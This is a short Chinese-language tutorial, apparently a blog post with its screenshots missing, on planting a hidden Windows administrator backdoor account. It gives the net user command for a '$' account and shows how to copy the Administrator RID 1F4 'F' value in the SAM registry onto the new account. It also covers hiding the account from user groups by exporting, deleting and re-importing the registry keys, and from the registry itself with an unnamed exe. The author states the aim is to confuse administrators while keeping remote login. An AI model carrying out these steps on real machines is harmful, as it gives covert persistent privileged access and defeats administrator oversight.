创建超级隐藏用户

 

1.先通过命令创建隐藏账户

net user test$ 123.com /add

在net user  

发现看不到用户 但是 在用户组是可以看到的

先把加入管理员组在禁用

我们可以把用户命名成上面一样的用户名  都是禁用状态 可以迷惑管理员

2.复制admin权限

打开注册表

打开注册表编辑器，点击：HKEY_LOCAL_MACHINE → SAM→SAM→Domains→Account→Users→Names→test$。看这个 ：test$就是我们刚刚创建的隐藏账户，如果sam 不能打开 说明没加权限

把完全控制勾上

在

就有了

Administrator   的key 是 1f4 

找到：000001F4，点击进去，在右上角，找到  F 这个文件，点击打开，复制里面的数据。

复制到 000003F5 的F文件

这个时候我们再看用户组

用户已禁用已经没了 并且test$ 用户就是admin 用户了  头像也还是禁用状态  可以远程登录

这是admin 下创建的文件夹

远程连接

权限复制成功

3.用户组隐藏

要在用户组里也看不到隐藏账户 修改注册表

将000003F5，点击右键，将数据导出到桌面，命名为1。将TEST$,点击右键，将数据导出到桌面，命名为2。

命令把test$ 删除 

net user test$ /del

 

在运行 1.reg 2.reg   

 

 只有在注册表能看见  用户组隐藏了

还是可以远程登录

4.注册表隐藏

 

把这个两个文件复制在主机上

把用户名和注册表键值填上

运行exe 自动隐藏

 

注册表也没了

试试还能不能登录

登录成功